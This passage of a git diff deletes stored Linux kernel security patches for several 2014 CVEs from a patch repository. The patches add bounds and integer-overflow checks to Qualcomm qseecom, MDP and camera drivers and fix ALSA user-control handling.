-+static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
-+				struct qseecom_send_cmd_req *req)
-+{
-+	int ret = 0;
-+	u32 reqd_len_sb_in = 0;
-+	struct qseecom_client_send_data_ireq send_data_req;
-+	struct qseecom_command_scm_resp resp;
-+	unsigned long flags;
-+	struct qseecom_registered_app_list *ptr_app;
-+	bool found_app = false;
-+	int name_len = 0;
-+
-+	reqd_len_sb_in = req->cmd_req_len + req->resp_len;
- 	/* find app_id & img_name from list */
- 	spin_lock_irqsave(&qseecom.registered_app_list_lock, flags);
- 	list_for_each_entry(ptr_app, &qseecom.registered_app_list_head,
-@@ -1965,6 +1990,10 @@ static int qseecom_send_cmd(struct qseecom_dev_handle *data, void __user *argp)
- 		pr_err("copy_from_user failed\n");
- 		return ret;
- 	}
-+
-+	if (__validate_send_cmd_inputs(data, &req))
-+		return -EINVAL;
-+
- 	ret = __qseecom_send_cmd(data, &req);
- 
- 	if (ret)
-@@ -1973,50 +2002,54 @@ static int qseecom_send_cmd(struct qseecom_dev_handle *data, void __user *argp)
- 	return ret;
- }
- 
--int boundary_checks_offset(struct qseecom_send_modfd_cmd_req *req,
-+int __boundary_checks_offset(struct qseecom_send_modfd_cmd_req *req,
- 			struct qseecom_send_modfd_listener_resp *lstnr_resp,
- 			struct qseecom_dev_handle *data, bool qteec,
- 			int i) {
--	int ret = 0;
- 
- 	if ((data->type != QSEECOM_LISTENER_SERVICE) &&
- 						(req->ifd_data[i].fd > 0)) {
- 		if (qteec) {
--			if (req->ifd_data[i].cmd_buf_offset >
--				req->cmd_req_len - TWO * sizeof(uint32_t)) {
--				pr_err("Invalid offset 0x%x\n",
-+			if ((req->cmd_req_len < (TWO * sizeof(uint32_t))) ||
-+				(req->ifd_data[i].cmd_buf_offset >
-+				req->cmd_req_len - (TWO * sizeof(uint32_t)))) {
-+				pr_err("Invalid offset (QTEEC req len) 0x%x\n",
- 					req->ifd_data[i].cmd_buf_offset);
--				return ++ret;
-+				return -EINVAL;
- 			}
- 		} else {
--			if (req->ifd_data[i].cmd_buf_offset >
--				req->cmd_req_len - sizeof(uint32_t)) {
--				pr_err("Invalid offset 0x%x\n",
-+			if ((req->cmd_req_len < sizeof(uint32_t)) ||
-+				(req->ifd_data[i].cmd_buf_offset >
-+				req->cmd_req_len - sizeof(uint32_t))) {
-+				pr_err("Invalid offset (req len) 0x%x\n",
- 					req->ifd_data[i].cmd_buf_offset);
--				return ++ret;
-+				return -EINVAL;
- 			}
- 		}
- 	} else if ((data->type == QSEECOM_LISTENER_SERVICE) &&
- 					(lstnr_resp->ifd_data[i].fd > 0)) {
- 		if (qteec) {
--			if (lstnr_resp->ifd_data[i].cmd_buf_offset >
--				lstnr_resp->resp_len - TWO * sizeof(uint32_t)) {
--				pr_err("Invalid offset 0x%x\n",
-+			if ((lstnr_resp->resp_len < TWO * sizeof(uint32_t)) ||
-+				(lstnr_resp->ifd_data[i].cmd_buf_offset >
-+				lstnr_resp->resp_len - TWO*sizeof(uint32_t))) {
-+				pr_err("Invalid offset (QTEEC resp len) 0x%x\n",
- 					lstnr_resp->ifd_data[i].cmd_buf_offset);
--				return ++ret;
-+				return -EINVAL;
- 			}
- 		} else {
--			if (lstnr_resp->ifd_data[i].cmd_buf_offset >
--				lstnr_resp->resp_len - sizeof(uint32_t)) {
--				pr_err("Invalid offset 0x%x\n",
-+			if ((lstnr_resp->resp_len < sizeof(uint32_t)) ||
-+				(lstnr_resp->ifd_data[i].cmd_buf_offset >
-+				lstnr_resp->resp_len - sizeof(uint32_t))) {
-+				pr_err("Invalid offset (lstnr resp len) 0x%x\n",
- 					lstnr_resp->ifd_data[i].cmd_buf_offset);
--				return ++ret;
-+				return -EINVAL;
- 			}
- 		}
- 	}
--	return ret;
-+	return 0;
- }
- 
-+#define SG_ENTRY_SZ   sizeof(struct qseecom_sg_entry)
- static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 			struct qseecom_dev_handle *data, bool qteec)
- {
-@@ -2095,7 +2128,7 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 			uint32_t *update;
- 			update = (uint32_t *) field;
- 
--			if (boundary_checks_offset(req, lstnr_resp, data,
-+			if (__boundary_checks_offset(req, lstnr_resp, data,
- 								qteec, i))
- 				goto err;
- 			if (cleanup)
-@@ -2112,22 +2145,25 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 
- 			if ((data->type != QSEECOM_LISTENER_SERVICE) &&
- 					(req->ifd_data[i].fd > 0)) {
--				if (req->ifd_data[i].cmd_buf_offset >
--					req->cmd_req_len -
--					sizeof(struct qseecom_sg_entry)) {
-+
-+				if ((req->cmd_req_len <
-+					 SG_ENTRY_SZ * sg_ptr->nents) ||
-+					(req->ifd_data[i].cmd_buf_offset >
-+						(req->cmd_req_len -
-+						SG_ENTRY_SZ * sg_ptr->nents))) {
- 					pr_err("Invalid offset = 0x%x\n",
--						req->ifd_data[i].
--						cmd_buf_offset);
-+					req->ifd_data[i].cmd_buf_offset);
- 					goto err;
- 				}
-+
- 			} else if ((data->type == QSEECOM_LISTENER_SERVICE) &&
- 					(lstnr_resp->ifd_data[i].fd > 0)) {
--				if (lstnr_resp->ifd_data[i].cmd_buf_offset >
--							lstnr_resp->resp_len -
--					sizeof(struct qseecom_sg_entry)) {
--					pr_err("Invalid offset = 0x%x\n",
--						lstnr_resp->ifd_data[i].
--							cmd_buf_offset);
-+
-+				if ((lstnr_resp->resp_len <
-+						SG_ENTRY_SZ * sg_ptr->nents) ||
-+				(lstnr_resp->ifd_data[i].cmd_buf_offset >
-+						(lstnr_resp->resp_len -
-+						SG_ENTRY_SZ * sg_ptr->nents))) {
- 					goto err;
- 				}
- 			}
-@@ -2179,37 +2215,14 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- 		return ret;
- 	}
- 
--	if (req.cmd_req_buf == NULL || req.resp_buf == NULL) {
--		pr_err("cmd buffer or response buffer is null\n");
--		return -EINVAL;
--	}
--	if (((uintptr_t)req.cmd_req_buf <
--				data->client.user_virt_sb_base) ||
--		((uintptr_t)req.cmd_req_buf >=
--		(data->client.user_virt_sb_base + data->client.sb_length))) {
--		pr_err("cmd buffer address not within shared bufffer\n");
--		return -EINVAL;
--	}
--
--	if (((uintptr_t)req.resp_buf <
--			data->client.user_virt_sb_base)  ||
--		((uintptr_t)req.resp_buf >=
--		(data->client.user_virt_sb_base + data->client.sb_length))) {
--		pr_err("response buffer address not within shared bufffer\n");
--		return -EINVAL;
--	}
--
--	if (req.cmd_req_len == 0 || req.cmd_req_len > data->client.sb_length ||
--		req.resp_len > data->client.sb_length) {
--		pr_err("cmd or response buffer length not valid\n");
--		return -EINVAL;
--	}
--
- 	send_cmd_req.cmd_req_buf = req.cmd_req_buf;
- 	send_cmd_req.cmd_req_len = req.cmd_req_len;
- 	send_cmd_req.resp_buf = req.resp_buf;
- 	send_cmd_req.resp_len = req.resp_len;
- 
-+	if (__validate_send_cmd_inputs(data, &send_cmd_req))
-+		return -EINVAL;
-+
- 	/* validate offsets */
- 	for (i = 0; i < MAX_ION_FD; i++) {
- 		if (req.ifd_data[i].cmd_buf_offset >= req.cmd_req_len) {
-@@ -2897,6 +2910,9 @@ int qseecom_send_command(struct qseecom_handle *handle, void *send_buf,
- 	req.cmd_req_buf = send_buf;
- 	req.resp_buf = resp_buf;
- 
-+	if (__validate_send_cmd_inputs(data, &req))
-+		return -EINVAL;
-+
- 	mutex_lock(&app_access_lock);
- 	atomic_inc(&data->ioctl_count);
- 	if (qseecom.support_bus_scaling) {
-@@ -4111,6 +4127,19 @@ static int qseecom_save_partition_hash(void __user *argp)
- static int __qseecom_qteec_validate_msg(struct qseecom_dev_handle *data,
- 				struct qseecom_qteec_req *req)
- {
-+
-+	if (req->req_len > UINT_MAX - req->resp_len) {
-+		pr_err("Integer overflow detected in req_len & rsp_len\n");
-+		return -EINVAL;
-+	}
-+
-+	if (req->req_len + req->resp_len > data->client.sb_length) {
-+		pr_debug("Not enough memory to fit cmd_buf.\n");
-+		pr_debug("resp_buf. Required: %u, Available: %zu\n",
-+		(req->req_len + req->resp_len), data->client.sb_length);
-+		return -ENOMEM;
-+	}
-+
- 	if (req->req_ptr == NULL || req->resp_ptr == NULL) {
- 		pr_err("cmd buffer or response buffer is null\n");
- 		return -EINVAL;
-@@ -4131,15 +4160,33 @@ static int __qseecom_qteec_validate_msg(struct qseecom_dev_handle *data,
- 		return -EINVAL;
- 	}
- 
--	if ((req->req_len == 0) || (req->resp_len == 0) ||
--		req->req_len > data->client.sb_length ||
--		req->resp_len > data->client.sb_length) {
-+	if ((req->req_len == 0) || (req->resp_len == 0)) {
- 		pr_err("cmd buf lengtgh/response buf length not valid\n");
- 		return -EINVAL;
- 	}
- 
--	if (req->req_len > UINT_MAX - req->resp_len) {
--		pr_err("Integer overflow detected in req_len/rsp_len, exit\n");
-+	if ((uintptr_t)req->req_ptr > (ULONG_MAX - req->req_len)) {
-+		pr_err("Integer overflow in req_len & req_ptr\n");
-+		return -EINVAL;
-+	}
-+
-+	if ((uintptr_t)req->resp_ptr > (ULONG_MAX - req->resp_len)) {
-+		pr_err("Integer overflow in resp_len & resp_ptr\n");
-+		return -EINVAL;
-+	}
-+
-+	if (data->client.user_virt_sb_base >
-+					(ULONG_MAX - data->client.sb_length)) {
-+		pr_err("Integer overflow in user_virt_sb_base & sb_length\n");
-+		return -EINVAL;
-+	}
-+	if ((((uintptr_t)req->req_ptr + req->req_len) >
-+		((uintptr_t)data->client.user_virt_sb_base +
-+						data->client.sb_length)) ||
-+		(((uintptr_t)req->resp_ptr + req->resp_len) >
-+		((uintptr_t)data->client.user_virt_sb_base +
-+						data->client.sb_length))) {
-+		pr_err("cmd buf or resp buf is out of shared buffer region\n");
- 		return -EINVAL;
- 	}
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4323/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4323/ANY/0001.patch
deleted file mode 100644
index c68dbaf0..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4323/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 014fa8def84c62893fa016e873c12de1da498603 Mon Sep 17 00:00:00 2001
-From: raghavendra ambadas <rambad@codeaurora.org>
-Date: Mon, 6 Oct 2014 14:59:57 +0530
-Subject: msm: mdp: Validate input arguments from user space
-
-Fully verify the input arguments from user client are safe
-to use.
-
-Change-Id: Ie14332443b187951009c63ebfb78456dcd9ba60f
-Signed-off-by: Raghavendra Ambadas <rambad@codeaurora.org>
----
- drivers/video/msm/mdp.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/video/msm/mdp.c b/drivers/video/msm/mdp.c
-index 4ede0b52..c00bd78 100644
---- a/drivers/video/msm/mdp.c
-+++ b/drivers/video/msm/mdp.c
-@@ -485,6 +485,11 @@ static int mdp_lut_hw_update(struct fb_cmap *cmap)
- 	c[1] = cmap->blue;
- 	c[2] = cmap->red;
- 
-+	if (cmap->start > MDP_HIST_LUT_SIZE || cmap->len > MDP_HIST_LUT_SIZE ||
-+			(cmap->start + cmap->len > MDP_HIST_LUT_SIZE)) {
-+		pr_err("mdp_lut_hw_update invalid arguments\n");
-+		return -EINVAL;
-+	}
- 	for (i = 0; i < cmap->len; i++) {
- 		if (copy_from_user(&r, cmap->red++, sizeof(r)) ||
- 		    copy_from_user(&g, cmap->green++, sizeof(g)) ||
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4324/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4324/ANY/0001.patch
deleted file mode 100644
index 37e7a938..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4324/ANY/0001.patch
+++ /dev/null
@@ -1,308 +0,0 @@
-From 8ad163e831a2b2c30551edb360f168a604cdb0bb Mon Sep 17 00:00:00 2001
-From: Alok Kediya <kediya@codeaurora.org>
-Date: Fri, 12 Dec 2014 04:20:59 -0800
-Subject: msm: camera: isp: Validate input parameter for vfe_write and vfe_read
-
-Validate input parameters for read and write operations in vfe to
-ensure operations are performed within vfe register boundary and
-within structure limits passed by caller.
-
-Change-Id: If3719de65b32773c2b6ff904da76a951dbfb11eb
-Signed-off-by: Alok Kediya <kediya@codeaurora.org>
----
- .../platform/msm/camera_v2/isp/msm_isp_util.c      | 162 ++++++++++++++-------
- .../msm/camera_v2/sensor/io/msm_camera_io_util.c   |  11 ++
- .../msm/camera_v2/sensor/io/msm_camera_io_util.h   |   2 +
- 3 files changed, 119 insertions(+), 56 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 620c01a..e1b79ce 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -494,9 +494,24 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 	struct msm_vfe_reg_cfg_cmd *reg_cfg_cmd,
- 	uint32_t *cfg_data, uint32_t cmd_len)
- {
-+	if (!vfe_dev || !reg_cfg_cmd) {
-+		pr_err("%s:%d failed: vfe_dev %p reg_cfg_cmd %p\n", __func__,
-+			__LINE__, vfe_dev, reg_cfg_cmd);
-+		return -EINVAL;
-+	}
-+	if ((reg_cfg_cmd->cmd_type != VFE_CFG_MASK) &&
-+		(!cfg_data || !cmd_len)) {
-+		pr_err("%s:%d failed: cmd type %d cfg_data %p cmd_len %d\n",
-+			__func__, __LINE__, reg_cfg_cmd->cmd_type, cfg_data,
-+			cmd_len);
-+		return -EINVAL;
-+	}
-+
-+	/* Validate input parameters */
- 	switch (reg_cfg_cmd->cmd_type) {
- 	case VFE_WRITE:
--	case VFE_READ: {
-+	case VFE_READ:
-+	case VFE_WRITE_MB: {
- 		if ((reg_cfg_cmd->u.rw_info.reg_offset >
- 			(UINT_MAX - reg_cfg_cmd->u.rw_info.len)) ||
- 			((reg_cfg_cmd->u.rw_info.reg_offset +
-@@ -522,6 +537,58 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		}
- 		break;
- 	}
-+
-+	case VFE_WRITE_DMI_16BIT:
-+	case VFE_WRITE_DMI_32BIT:
-+	case VFE_WRITE_DMI_64BIT:
-+	case VFE_READ_DMI_16BIT:
-+	case VFE_READ_DMI_32BIT:
-+	case VFE_READ_DMI_64BIT: {
-+		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
-+			if ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset <=
-+				reg_cfg_cmd->u.dmi_info.lo_tbl_offset) ||
-+				(reg_cfg_cmd->u.dmi_info.hi_tbl_offset -
-+				reg_cfg_cmd->u.dmi_info.lo_tbl_offset !=
-+				(sizeof(uint32_t)))) {
-+				pr_err("%s:%d hi %d lo %d\n",
-+					__func__, __LINE__,
-+					reg_cfg_cmd->u.dmi_info.hi_tbl_offset,
-+					reg_cfg_cmd->u.dmi_info.hi_tbl_offset);
-+				return -EINVAL;
-+			}
-+			if (reg_cfg_cmd->u.dmi_info.len <= sizeof(uint32_t)) {
-+				pr_err("%s:%d len %d\n",
-+					__func__, __LINE__,
-+					reg_cfg_cmd->u.dmi_info.len);
-+				return -EINVAL;
-+			}
-+			if (((UINT_MAX -
-+				reg_cfg_cmd->u.dmi_info.hi_tbl_offset) <
-+				(reg_cfg_cmd->u.dmi_info.len -
-+				sizeof(uint32_t))) ||
-+				((reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
-+				reg_cfg_cmd->u.dmi_info.len -
-+				sizeof(uint32_t)) > cmd_len)) {
-+				pr_err("%s:%d hi_tbl_offset %d len %d cmd %d\n",
-+					__func__, __LINE__,
-+					reg_cfg_cmd->u.dmi_info.hi_tbl_offset,
-+					reg_cfg_cmd->u.dmi_info.len, cmd_len);
-+				return -EINVAL;
-+			}
-+		}
-+		if ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset >
-+			(UINT_MAX - reg_cfg_cmd->u.dmi_info.len)) ||
-+			((reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
-+			reg_cfg_cmd->u.dmi_info.len) > cmd_len)) {
-+			pr_err("%s:%d lo_tbl_offset %d len %d cmd_len %d\n",
-+				__func__, __LINE__,
-+				reg_cfg_cmd->u.dmi_info.lo_tbl_offset,
-+				reg_cfg_cmd->u.dmi_info.len, cmd_len);
-+			return -EINVAL;
-+		}
-+		break;
-+	}
-+
- 	default:
- 		break;
- 	}
-@@ -535,39 +602,27 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		break;
- 	}
- 	case VFE_WRITE_MB: {
--		uint32_t *data_ptr = cfg_data +
--			reg_cfg_cmd->u.rw_info.cmd_data_offset/4;
--
--		if ((UINT_MAX - sizeof(*data_ptr) <
--					reg_cfg_cmd->u.rw_info.reg_offset) ||
--			(resource_size(vfe_dev->vfe_mem) <
--			reg_cfg_cmd->u.rw_info.reg_offset +
--			sizeof(*data_ptr))) {
--			pr_err("%s: VFE_WRITE_MB: Invalid length\n", __func__);
--			return -EINVAL;
--		}
--		msm_camera_io_w_mb(*data_ptr, vfe_dev->vfe_base +
--			reg_cfg_cmd->u.rw_info.reg_offset);
-+		msm_camera_io_memcpy_mb(vfe_dev->vfe_base +
-+			reg_cfg_cmd->u.rw_info.reg_offset,
-+			cfg_data + reg_cfg_cmd->u.rw_info.cmd_data_offset/4,
-+			reg_cfg_cmd->u.rw_info.len);
- 		break;
- 	}
- 	case VFE_CFG_MASK: {
- 		uint32_t temp;
--		if (resource_size(vfe_dev->vfe_mem) <
--				reg_cfg_cmd->u.mask_info.reg_offset)
--			return -EINVAL;
--		temp = msm_camera_io_r(vfe_dev->vfe_base +
--			reg_cfg_cmd->u.mask_info.reg_offset);
--
--		temp &= ~reg_cfg_cmd->u.mask_info.mask;
--		temp |= reg_cfg_cmd->u.mask_info.val;
- 		if ((UINT_MAX - sizeof(temp) <
--					reg_cfg_cmd->u.mask_info.reg_offset) ||
-+			reg_cfg_cmd->u.mask_info.reg_offset) ||
- 			(resource_size(vfe_dev->vfe_mem) <
- 			reg_cfg_cmd->u.mask_info.reg_offset +
- 			sizeof(temp))) {
- 			pr_err("%s: VFE_CFG_MASK: Invalid length\n", __func__);
- 			return -EINVAL;
- 		}
-+		temp = msm_camera_io_r(vfe_dev->vfe_base +
-+			reg_cfg_cmd->u.mask_info.reg_offset);
-+
-+		temp &= ~reg_cfg_cmd->u.mask_info.mask;
-+		temp |= reg_cfg_cmd->u.mask_info.val;
- 		msm_camera_io_w(temp, vfe_dev->vfe_base +
- 			reg_cfg_cmd->u.mask_info.reg_offset);
- 		break;
-@@ -579,22 +634,9 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
- 		uint32_t hi_val, lo_val, lo_val1;
- 		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
--			if ((UINT_MAX - reg_cfg_cmd->u.dmi_info.hi_tbl_offset <
--						reg_cfg_cmd->u.dmi_info.len) ||
--				(reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
--				reg_cfg_cmd->u.dmi_info.len > cmd_len)) {
--				pr_err("Invalid Hi Table out of bounds\n");
--				return -EINVAL;
--			}
- 			hi_tbl_ptr = cfg_data +
- 				reg_cfg_cmd->u.dmi_info.hi_tbl_offset/4;
- 		}
--
--		if (reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
--			reg_cfg_cmd->u.dmi_info.len > cmd_len) {
--			pr_err("Invalid Lo Table out of bounds\n");
--			return -EINVAL;
--		}
- 		lo_tbl_ptr = cfg_data +
- 			reg_cfg_cmd->u.dmi_info.lo_tbl_offset/4;
- 		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT)
-@@ -627,30 +669,18 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
- 		uint32_t hi_val, lo_val, lo_val1;
- 		if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
--			if (reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
--				reg_cfg_cmd->u.dmi_info.len > cmd_len) {
--				pr_err("Invalid Hi Table out of bounds\n");
--				return -EINVAL;
--			}
- 			hi_tbl_ptr = cfg_data +
- 				reg_cfg_cmd->u.dmi_info.hi_tbl_offset/4;
- 		}
- 
--		if (reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
--			reg_cfg_cmd->u.dmi_info.len > cmd_len) {
--			pr_err("Invalid Lo Table out of bounds\n");
--			return -EINVAL;
--		}
- 		lo_tbl_ptr = cfg_data +
- 			reg_cfg_cmd->u.dmi_info.lo_tbl_offset/4;
- 
--		for (i = 0; i < reg_cfg_cmd->u.dmi_info.len/4; i++) {
--			if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
--				hi_val = msm_camera_io_r(vfe_dev->vfe_base +
--					vfe_dev->hw_info->dmi_reg_offset);
--				*hi_tbl_ptr++ = hi_val;
--			}
-+		if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT)
-+			reg_cfg_cmd->u.dmi_info.len =
-+				reg_cfg_cmd->u.dmi_info.len / 2;
- 
-+		for (i = 0; i < reg_cfg_cmd->u.dmi_info.len/4; i++) {
- 			lo_val = msm_camera_io_r(vfe_dev->vfe_base +
- 					vfe_dev->hw_info->dmi_reg_offset + 0x4);
- 
-@@ -660,6 +690,13 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 				lo_val |= lo_val1 << 16;
- 			}
- 			*lo_tbl_ptr++ = lo_val;
-+			if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
-+				hi_val = msm_camera_io_r(vfe_dev->vfe_base +
-+					vfe_dev->hw_info->dmi_reg_offset);
-+				*hi_tbl_ptr = hi_val;
-+				hi_tbl_ptr += 2;
-+				lo_tbl_ptr++;
-+			}
- 		}
- 		break;
- 	}
-@@ -698,7 +735,7 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 			if ((data_ptr < cfg_data) ||
- 				(UINT_MAX / sizeof(*data_ptr) <
- 				 (data_ptr - cfg_data)) ||
--				(sizeof(*data_ptr) * (data_ptr - cfg_data) >
-+				(sizeof(*data_ptr) * (data_ptr - cfg_data) >=
- 				 cmd_len))
- 				return -EINVAL;
- 			*data_ptr++ = msm_camera_io_r(vfe_dev->vfe_base +
-@@ -707,9 +744,16 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		}
- 		break;
- 	}
--	case GET_SOC_HW_VER:
--		*cfg_data = vfe_dev->soc_hw_version;
--		break;
-+	case GET_SOC_HW_VER: {
-+	  if (cmd_len < sizeof(uint32_t)) {
-+			pr_err("%s:%d failed: invalid cmd len %u exp %zu\n",
-+				__func__, __LINE__, cmd_len,
-+				sizeof(uint32_t));
-+			return -EINVAL;
-+		}
-+	  *cfg_data = vfe_dev->soc_hw_version;
-+	  break;
-+	}
- 	case GET_MAX_CLK_RATE: {
- 		int rc = 0;
- 
-@@ -728,6 +772,12 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		break;
- 	}
- 	case SET_WM_UB_SIZE: {
-+	  	  if (cmd_len < sizeof(uint32_t)) {
-+			pr_err("%s:%d failed: invalid cmd len %u exp %zu\n",
-+				__func__, __LINE__, cmd_len,
-+				sizeof(uint32_t));
-+			return -EINVAL;
-+		}
- 		vfe_dev->vfe_ub_size = *cfg_data;
- 		break;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-index 46a0542..7d369ff 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-@@ -107,6 +107,17 @@ void msm_camera_io_memcpy(void __iomem *dest_addr,
- 	msm_camera_io_dump(dest_addr, len);
- }
- 
-+void msm_camera_io_memcpy_mb(void __iomem *dest_addr,
-+	void __iomem *src_addr, u32 len)
-+{
-+	int i;
-+	u32 *d = (u32 *) dest_addr;
-+	u32 *s = (u32 *) src_addr;
-+
-+	for (i = 0; i < (len / 4); i++)
-+		msm_camera_io_w_mb(*s++, d++);
-+}
-+
- int msm_cam_clk_sel_src(struct device *dev, struct msm_cam_clk_info *clk_info,
- 		struct msm_cam_clk_info *clk_src_info, int num_clk)
- {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-index 2e6f809..90925a9 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-@@ -28,6 +28,8 @@ u32 msm_camera_io_r_mb(void __iomem *addr);
- void msm_camera_io_dump(void __iomem *addr, int size);
- void msm_camera_io_memcpy(void __iomem *dest_addr,
- 		void __iomem *src_addr, u32 len);
-+void msm_camera_io_memcpy_mb(void __iomem *dest_addr,
-+	void __iomem *src_addr, u32 len);
- int msm_cam_clk_sel_src(struct device *dev, struct msm_cam_clk_info *clk_info,
- 		struct msm_cam_clk_info *clk_src_info, int num_clk);
- int msm_cam_clk_enable(struct device *dev, struct msm_cam_clk_info *clk_info,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4655/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4655/ANY/0001.patch
deleted file mode 100644
index e310caaa..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4655/ANY/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From 82262a46627bebb0febcc26664746c25cef08563 Mon Sep 17 00:00:00 2001
-From: Lars-Peter Clausen <lars@metafoo.de>
-Date: Wed, 18 Jun 2014 13:32:32 +0200
-Subject: ALSA: control: Fix replacing user controls
-
-There are two issues with the current implementation for replacing user
-controls. The first is that the code does not check if the control is actually a
-user control and neither does it check if the control is owned by the process
-that tries to remove it. That allows userspace applications to remove arbitrary
-controls, which can cause a user after free if a for example a driver does not
-expect a control to be removed from under its feed.
-
-The second issue is that on one hand when a control is replaced the
-user_ctl_count limit is not checked and on the other hand the user_ctl_count is
-increased (even though the number of user controls does not change). This allows
-userspace, once the user_ctl_count limit as been reached, to repeatedly replace
-a control until user_ctl_count overflows. Once that happens new controls can be
-added effectively bypassing the user_ctl_count limit.
-
-Both issues can be fixed by instead of open-coding the removal of the control
-that is to be replaced to use snd_ctl_remove_user_ctl(). This function does
-proper permission checks as well as decrements user_ctl_count after the control
-has been removed.
-
-Note that by using snd_ctl_remove_user_ctl() the check which returns -EBUSY at
-beginning of the function if the control already exists is removed. This is not
-a problem though since the check is quite useless, because the lock that is
-protecting the control list is released between the check and before adding the
-new control to the list, which means that it is possible that a different
-control with the same settings is added to the list after the check. Luckily
-there is another check that is done while holding the lock in snd_ctl_add(), so
-we'll rely on that to make sure that the same control is not added twice.
-
-Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
-Acked-by: Jaroslav Kysela <perex@perex.cz>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/control.c | 25 +++++++++----------------
- 1 file changed, 9 insertions(+), 16 deletions(-)
-
-diff --git a/sound/core/control.c b/sound/core/control.c
-index 00ab034..1f413c2 100644
---- a/sound/core/control.c
-+++ b/sound/core/control.c
-@@ -1154,8 +1154,6 @@ static int snd_ctl_elem_add(struct snd_ctl_file *file,
- 	struct user_element *ue;
- 	int idx, err;
- 
--	if (!replace && card->user_ctl_count >= MAX_USER_CONTROLS)
--		return -ENOMEM;
- 	if (info->count < 1)
- 		return -EINVAL;
- 	access = info->access == 0 ? SNDRV_CTL_ELEM_ACCESS_READWRITE :
-@@ -1164,21 +1162,16 @@ static int snd_ctl_elem_add(struct snd_ctl_file *file,
- 				 SNDRV_CTL_ELEM_ACCESS_TLV_READWRITE));
- 	info->id.numid = 0;
- 	memset(&kctl, 0, sizeof(kctl));
--	down_write(&card->controls_rwsem);
--	_kctl = snd_ctl_find_id(card, &info->id);
--	err = 0;
--	if (_kctl) {
--		if (replace)
--			err = snd_ctl_remove(card, _kctl);
--		else
--			err = -EBUSY;
--	} else {
--		if (replace)
--			err = -ENOENT;
-+
-+	if (replace) {
-+		err = snd_ctl_remove_user_ctl(file, &info->id);
-+		if (err)
-+			return err;
- 	}
--	up_write(&card->controls_rwsem);
--	if (err < 0)
--		return err;
-+
-+	if (card->user_ctl_count >= MAX_USER_CONTROLS)
-+		return -ENOMEM;
-+
- 	memcpy(&kctl.id, &info->id, sizeof(info->id));
- 	kctl.count = info->owner ? info->owner : 1;
- 	access |= SNDRV_CTL_ELEM_ACCESS_USER;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4656/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4656/ANY/0001.patch
deleted file mode 100644
index 416150ba..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4656/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 883a1d49f0d77d30012f114b2e19fc141beb3e8e Mon Sep 17 00:00:00 2001
-From: Lars-Peter Clausen <lars@metafoo.de>
-Date: Wed, 18 Jun 2014 13:32:35 +0200
-Subject: ALSA: control: Make sure that id->index does not overflow
-
